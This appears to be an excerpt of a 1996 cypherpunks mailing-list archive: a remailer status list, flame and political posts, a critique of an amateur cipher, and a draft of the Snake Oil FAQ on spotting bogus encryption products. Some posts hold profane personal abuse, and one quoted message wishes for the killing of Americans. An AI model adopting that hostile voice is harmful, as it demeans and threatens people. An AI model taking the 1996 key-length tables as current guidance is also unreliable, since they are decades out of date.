$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash ksub latent cut ek mix reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 16 Sep 96 6:48:06 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
exon     remailer@remailer.nl.com         *#**##*#***#     1:16 100.00%
jam      remailer@cypherpunks.ca          *****++*****    17:07  99.99%
squirrel mix@squirrel.owl.de              -+++---++++   2:04:26  99.98%
mix      mixmaster@remail.obscura.com     +++++++++--+  1:01:22  99.98%
lead     mix@zifi.genetics.utah.edu       + -++*++++++    41:18  99.84%
amnesia  amnesia@chardos.connix.com       -----------   3:38:09  99.82%
dustbin  dustman@athensnet.com              -+ ++----+  1:24:30  99.74%
cyber    alias@alias.cyberpass.net        * **+ ++*+ *    33:26  99.37%
extropia remail@miron.vip.best.com        ------.--.-  13:13:34  99.13%
haystack haystack@holy.cow.net            *###-#*#####     3:35  98.87%
middle   middleman@jpunix.com               --   - --+  2:53:19  98.74%
replay   remailer@replay.com              ****+* *****     4:45  98.13%
winsock  winsock@c2.org                   ---  -+--++   1:20:34  97.83%
balls    remailer@huge.cajones.com        ******** *       5:06  88.34%
nemesis  remailer@meaning.com             *               24:33   4.73%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 16 Sep 1996 17:24:23 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "But if it saves just one child."
In-Reply-To: <ae623b3b01021004ddee@[207.167.93.63]>
Message-ID: <199609160656.AAA23532@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <ae623b3b01021004ddee@[207.167.93.63]>, on 09/15/96 
   at 03:51 PM, tcmay@got.net (Timothy C. May) said:

= .The rallying cry heard so often these days: "But if it saves just one child."
= .
        "...now that we have saved just one child, save another, a boy 
    and a girl, so they breed,and we can justify our jobs feeding: 
    
            "just one more child...."

        "...give until you bleed."

= .(Hillary also thinks it takes a village to save the children.)

        yeah, a _global_ village with good King Hillary.

            welcome to "Logan's Run"  (and Fahrenheit 451)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 17 Sep 1996 20:48:30 +0800
To: attila <attila@primenet.com>
Subject: Re: "But if it saves just one child."
In-Reply-To: <199609160656.AAA23532@InfoWest.COM>
Message-ID: <323D617C.79B5@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:
> In <ae623b3b01021004ddee@[207.167.93.63]>, on 09/15/96
>    at 03:51 PM, tcmay@got.net (Timothy C. May) said:
> = .The rallying cry heard so often these days: "But if it saves just 
> one child."
>         "...now that we have saved just one child, save another, a boy
>     and a girl, so they breed,and we can justify our jobs feeding:
>             "just one more child...."
>         "...give until you bleed."
> = .(Hillary also thinks it takes a village to save the children.)
>         yeah, a _global_ village with good King Hillary.
>             welcome to "Logan's Run"  (and Fahrenheit 451)

I've been looking for a good price on a large Hillary Clinton button for 
several weeks now. The best I've seen so far was $3 at a booth in the 
Santa Monica 3rd Street Promenade. Since I want to give the absolute 
least cash possible to these people (less than none, preferably) I'd 
just like to know if anyone knows of a better deal.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Mon, 16 Sep 1996 15:54:28 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae61f6ec05021004f2e5@[207.167.93.63]>
Message-ID: <199609160537.HAA26159@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

> The thing about _traditional_ charity, of the religious or community sort,
> was that it was not treated as an "entitlement," as something the resentful
> masses could "demand" as part of their "human rights."

   There's no substantial difference between their resentful whining about
their rights and your resentful whining about your rights - except maybe
that you whine more.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:59:18 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <842781779.23486.0@fatmans.demon.co.uk>
Message-ID: <43kcuD64w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Mon Sep 16 05:27:03 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 16 Sep 96 07:19:42 EDT
	for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA14516 for dlv@bwalk.dm.com; Mon, 16 Sep 96 05:27:03 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net  id ak19721;
          15 Sep 96 11:16 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa23486; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA842733091 ; Sat, 14 Sep 96 20:31:31 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Sat, 14 Sep 1996 20:31:31 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Internet Drivers' Licenses
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781779.23486.0@fatmans.demon.co.uk>


> mpd@netcom.com (Mike Duvos) writes:
> > A given key could mean "I am Mike Duvos", "I am Tim May"
> 
> Fart.

How long is it going to take for you to grow up you trailer 
butt-fucker?

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:41:44 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <842781740.23307.0@fatmans.demon.co.uk>
Message-ID: <L5kcuD65w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Mon Sep 16 04:22:40 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 16 Sep 96 07:19:49 EDT
	for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA11172 for dlv@bwalk.dm.com; Mon, 16 Sep 96 04:22:40 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net  id ak07550;
          15 Sep 96 13:11 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa23307; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA842732056 ; Sat, 14 Sep 96 20:14:16 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Sat, 14 Sep 1996 20:14:14 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: China joins Singapore, Germany, ....
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781740.23307.0@fatmans.demon.co.uk>


> 
> Nazi POWs were Nazis and deserved to be killed. Likewise, American soldiers
> are murderous scum. I wish Saddam Hussein the best of luck in killing every
> American he can get.
> 
> P.S. Please do not cc: me.

Fuck you.

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 16 Sep 1996 23:47:21 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Drivers' Licenses
In-Reply-To: <842781757.23377.0@fatmans.demon.co.uk>
Message-ID: <86kcuD66w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Mon Sep 16 04:17:55 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Mon, 16 Sep 96 07:19:56 EDT
	for dlv
Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10926 for dlv@bwalk.dm.com; Mon, 16 Sep 96 04:17:55 -0400
Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net  id ak19657;
          15 Sep 96 11:16 GMT
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa23377; 15 Sep 96 11:02 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA842732060 ; Sat, 14 Sep 96 20:14:20 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Sat, 14 Sep 1996 20:14:14 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Internet Drivers' Licenses
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842781757.23377.0@fatmans.demon.co.uk>


> This is the kind of project cypherpunks would do if they were writing code,
> instead of lies and personal attacks, the way Tim May (fart) does.
 
Is a Tim May reference compulsory in all of your postings you stupid 
little man?


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Tue, 17 Sep 1996 01:04:10 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Cryptography of a sort - redux
In-Reply-To: <323CADBE.3D54@gte.net>
Message-ID: <323D53EC.298E@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> The only way to recover the original text is to reposition the
> shuffled bits correctly, which requires brute-force guessing of the
> pseudo-random-number output. 

Even if I know the PRNG algorithm?  And just what is it that you
propose to use for the PRNG?

> This guess is very simple for the first encoding layer, but
> compounds exponentially in subsequent encodings

Exponentially?  Could you provide the math to explain how your
composition of PRNG's gives this exponential increase in 
difficulty?

> , so
> that after half a dozen or a dozen passes, where the executable
> program(s) is called from scratch for each pass, the shuffling rapidly
> approaches true randomness, and cannot be decrypted in practice except
> through the exact mirror-image reversal of the encryption passes.

So what do the encryption keys look like?  And what's this "true
randomness" stuff?


______c_________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being,
       m5@tivoli.com * m101@io.com       *    
      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Sep 1996 04:20:56 +0800
To: John Young <jya@pipeline.com>
Subject: Re: IBM_gak
In-Reply-To: <199609161225.MAA10936@pipe1.ny3.usa.pipeline.com>
Message-ID: <Pine.3.89.9609160910.A7964-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 16 Sep 1996, John Young wrote:

>    9-15-96. PcWe: 
>  
>    "IBM Boosts Encryption Initiative " 
>  
>       IBM security initiatives next month will include a 
>       new way to build encryption into software and 
>       technology that could enable U.S. companies to export 
>       products with strong encryption algorithms. IBM also 
>       will introduce several "key-recovery" technologies 
>       that could enable businesses to satisfy the 
>       requirement imposed by the U.S. government that it be 
>       able to access encrypted data on demand.

Aparently, Al Gore's recent phone calls to everybody who is anybody in the 
industry have paid off. After HP, TIS, and other unnamed parties, now IBM 
is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to 
a PKI near you.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 17 Sep 1996 01:30:57 +0800
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: RE: Workers Paradise. /Political rant.
Message-ID: <9608168428.AA842891743@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> Crypto Anarchy means getting rid of deadwood the old-fashioned way.

dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote:
>Starting with the lying old fart himself.

You shouldn't be so hard on Tim. I tried giving up farting years ago but I found
I gained a lot of weight. It's also become more socially acceptable as evidenced
by the new farting section in many English pubs. They even have a special
section for me on some international flights. And unlike smoking, you *can* do
it in the toilet. Besides, it can't be worse than smoking. Unless, perhaps, you
do both at the same time...

Cheers,
James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Tue, 17 Sep 1996 04:54:26 +0800
To: cypherpunks@toad.com
Subject: Snake Oil FAQ 0.4 [comments appreciated]
Message-ID: <199609161356.JAA09796@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



The Snake Oil FAQ version 0.4 is waiting for you to look at it and
comment on
http://research.megasoft.com/people/cmcurtin/snake-oil/snake-oil-faq.html

The text version follows...

-matt

--------------------------- snake-oil-faq ----------------------------

                           Snake-Oil Warning Signs
                        Encryption Software to Avoid
      $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $
Distribution

Please do not distribute this beyond the circles of cryptographic competence
yet. This is an incomplete work-in-progress. Feedback is greatly
appreciated.

The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt,
alt.security, comp.security, and comp.infosystems. We're targeting those who
have influence over or direct involvement in the purchasing decisions of
computer security software and equipment in the corporate and academic
worlds, as well as individual users who wish to assert their privacy through
the use of good cryptography.

Disclaimer

All contributors' employers will no doubt disown any statements herein.
We're not speaking for anyone but ourselves, based on our own experiences,
etc., etc., etc. This is a general guideline, and as such, cannot be the
sole metric by which a security product is rated, since there can be
exceptions to any of these rules. (But if you're looking at something that
sounds familiar on several of the 'things to watch out for,' you're probably
dealing with snake oil. From time to time, a reputable and decent vendor
will produce something that is actually quite good, but will use some
braindead marketing technique, so be aware of exceptions.)

Every effort has been made to produce an accurate and useful document, but
the information contained herein is completely without warranty. If you find
any errors, or wish to otherwise contribute, please contact the document
keeper, C Matthew Curtin <cmcurtin@research.megasoft.com>

Introduction

Good cryptography is an excellent and necessary tool for almost anyone.
However, there is a multitude of products around. Many good cryptographic
products are available, both commercial (including shareware) and free.
However, there are also some extremely bad cryptographic products (known in
the field as "Snake Oil"), which not only fail do their job of providing
security, but are based on, and add to, the many misconceptions and
misunderstandings surrounding cryptography and security.

Superficially, it is difficult for someone to distinguish the output of a
secure encryption utility from snake oil: both look garbled. The purpose of
this document is present some obvious "red flags" so that people unfamiliar
with the nuts and bolts of cryptography can use as a guideline for
determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not
mention specific products or algorithms as being "good" or "Snake Oil".

When evaluating any product, be sure to understand what your needs are. For
data security products, what do you need protected? Do you want an archiver
that supports strong encryption? An E-mail client? Something that will
encrypt on-line communications? Do you want to encrypt an entire disk or
partition, or selectively some files? Do you need on-the-fly (automatic)
encryption and decryption, or are you willing to select when and which files
you want encrypted? How secure is "secure enough?" Does the data need to be
unreadable by third parties for 5 minutes? One year? 50 years? 100 years?

Different products will serve different needs, and it's rare that a product
will serve every need. (Sometimes a product won't be needed: it may be
better to use a utility to encrypt files, transmit them over a network using
standard file transfer tools, and decrypt them at the other end than to use
a separate encrypted utility in some cases.)

Some basics

The cryptography-faq (found at
ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial
of cryptography, and should also be consulted. In an effort to make this FAQ
more complete, some very basic topics are included below.

Conventional vs. Public Key Cryptography

There are two basic types of cryptosystems: symmetric (also known as
"conventional," sometimes also called "private key") and asymmetric (public
key). Symmetric ciphers require both the sender and the recipient to have
the same key. That key is applied to encrypt the data by the sender, and
again by the recipient to decrypt the data. Asymmetric ciphers are much more
flexible, from a key management perspective. Each user has a pair of keys: a
public key and a private key. The public key is shared widely, given to
everyone, while the private key is kept secret. If Alice wishes to mail Bob
some secrets, she simply gets Bob's public key, encrypts her message with
it, and sends it off to Bob. When Bob gets the message, he uses is private
key to decrypt the message.

Asymmetric cryptosystems are much slower than their symmetric counterparts.
Also, key sizes must be much larger. See the cryptography FAQ for a more
detailed discussion of the topic.

Key Sizes

Some ciphers, while currently secure against most attacks, are not
considered viable in the next few years because of relatively small keysizes
and increasing processor speeds (making a brute-force attacks feasible). The
tables below should give some general guidelines for making intelligent
decisions about the key length you need. If the key is too short, the system
will be easily broken, even if the cipher is a good one.

In [1] and [2], we're presented with some guidelines for deciding
appropriate key length. (It is important to note that this is based on the
ability to predict computing power 40, 65, and 100 years from now. Major
breakthroughs in computing power 30 years from now might render everything
on this chart kiddieplay.)

               Security Requirements for Different Information

              Type of Traffic                Lifetime   Minimum [Symmetric]
                                                             Key Length
 Tactical military information             minutes/hours     56-64 bits
 Product announcements, mergers, interest
 rates                                      days/weeks        64 bits
 Long-term business plans                      years          64 bits
 Trade secrets (e.g., recipe for
 Coca-Cola)                                   decades         112 bits
 H-bomb secrets                              >40 years        128 bits
 Identities of spies                         >50 years        128 bits
 Personal affairs                            >50 years        128 bits
 Diplomatic embarrassments                   >65 years   at least 128 bits
 U.S. Census data                            100 years   at least 128 bits

As mentioned earlier, asymmetric ciphers require significantly longer keys
to provide the same level of security as their symmetric cipher
counterparts. Here is a comparison table, again, from Applied Cryptography,
second edition.
                    Symmetric and Public-Key Lengths With
                  Similar Resistance to Brute-Force Attacks

                 Symmetric Key Length Public-key Key Length
                        56 bits             384 bits
                        64 bits             512 bits
                        80 bits             768 bits
                       112 bits             1792 bits
                       128 bits             2304 bits

Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when
examining an encryption product

   * Technobabble

     The vendor's description of the product may contain a lot of
     hard-to-follow use of technical terms to describe how the product
     works. If this appears to be confusing nonsense, it may very well be
     (even to someone familiar with the terminology). Technobabble is a good
     means of confusing a potential user and masking the fact that the
     vendor doesn't understand anything either.

     A sign of technobabble is a descrption which drops a lot of technical
     terms for how the system works without actually explaining how it
     works. Often specifically coined terms are used to describe the scheme
     which are not found in the literature.

   * New Type of Cryptography?

     Beware of any vendor who claims to have invented a "new type of
     cryptography" or a "revolutionary breakthrough". Truly "new
     break-throughs" are likely to show up in the literature, and many in
     the field are unlikely to trust them until after years of analysis, by
     which time they are not so new anymore.

     Avoid software which claims to use 'new paradigms' of computing such as
     cellular automata, neural nets, genetic algorithms, chaos theory, etc.
     Just because software uses to different method of computation doesn't
     make it more secure.

     Anything that claims to have invented a new public key cryptosystem
     without publishing the details or underlying mathematical principles is
     highly suspect. Modern cryptography, especially public key systems, is
     grounded in mathematical theory. The security is based on problems that
     are believed, if not known to be hard to solve.

     The strength of any encryption scheme is only proven by the test of
     time. New crypto is like new pharmaceuticals, not new cars.

   * Proprietary Algorithms

     Avoid software which uses "proprietary" or "secret" algorithms.
     Security through obscurity is not considered a safe means of protecting
     your data. If the vendor does not feel confident that the method used
     can withstand years of scrutiny by the academic community, then you
     should be wary of trusting it. (Note that a vendor who specializes in
     the cryptography may have a proprietary algorithm which they'll show to
     others if they sign a non-disclosure agreement. If the vendor is
     well-reputed in the field, this can be an exception.)

     Beware of specially modified versions of well-known algorithms. This
     may intentionally or unintentionally weaken the cipher.

     The use of a trusted algorithm, if not with technical notes explaining
     the implementation (if not availability of the source code for the
     product) are a sign of good faith on the part of the vendor that you
     can take apart and test the implementation yourself.

     A common excuse for not disclosing how a program works is that "hackers
     might try to crack the program's security." While this may be a valid
     concern, it should be noted that such 'hackers' can reverse engineer
     the program to see how it works anyway. If the program is implemented
     properly and the algorithm is secure, this is not a problem. (If a
     hypothetical 'hacker' was able to get access you your system, access to
     encrypted data might be the least of your problems.)

   * Experienced Security Experts and Rave Reviews

     Beware of any product claiming that "experienced security experts" have
     analyzed it, but it won't say who (especially if the scheme has not
     been published in a reputable journal).

     Don't rely on reviews in newspapers, magazines or television shows,
     since they generally don't have cryptologists (celebrity hackers who
     know about telephone systems don't count) take the software apart for
     them.

     Just because the vendor is a well known company or the algorithm is
     patented doesn't make it secure either.

   * Unbreakability

     Some vendors will claim their software is "unbreakable". This is
     marketing hype, and a common sign of snake-oil. Avoid any vendor that
     makes unrealistic claims.

     No algorithm is unbreakable. Even the best algorithms are breakable
     using "brute force" (trying every possible key), but if the key size is
     large enough, this is impractical even with vast amounts of computing
     power.

     One-time pads are unbreakable, but they must be implemented perfectly,
     which is, at best, very difficult. See the next section for a more
     detailed discussion.

   * One-Time-Pads

     A vendor might claim the system uses a one-time-pad (OTP), which is
     theoretically unbreakable. That is, snake-oil sellers will try to
     capitalize on the known strength of a OTP. It is important to
     understand that any variation in the implementation means that it is
     not an OTP, and has nowhere near the security of an OTP.

     A OTP system is not an algorithm. It works by having a "pad" of random
     bits in the possession of both the sender and recipient. The message is
     encrypted using the next n bits in the pad as they key, where n is the
     number of bits in the message. After the bits are used from the pad,
     they're destroyed, and can never again be used. The bits in the pad
     must be truly random, generated using a real random source, such as
     specialized hardware, radioactive decay timings, etc., and not from an
     algorithm or cipher. Anything else is not a one-time-pad.

     The vendor may confuse random session keys or initialization vectors
     with OTPs.

   * Algorithm or product XXX is insecure

     Be wary of anything that makes claims that particular algorithms or
     other products are insecure without backing up those claims (or at
     least citing references to them).

     Sometimes attacks are theoretical or impractical (requiring special
     circumstances or massive computing power running for many years), and
     it's easy to confuse a layman by mentioning these.

   * Keys and Passwords

     The "key" and the "password" are often not the same thing. The "key"
     generally refers to the actual data used by the cipher, while the
     "password" refers to the word or phrase the user types in, which the
     software converts into the key (usually through a process called
     "hashing" or "key initialization").

     The reason this is done is because the characters a user is likely to
     type in do not cover the full range of possible characters. (Such keys
     would be more redundant and easier for an attacker to guess.) By
     hashing a key can be made from an arbitrary password that covers the
     full range of possible keys. It also allows one to use longer words, or
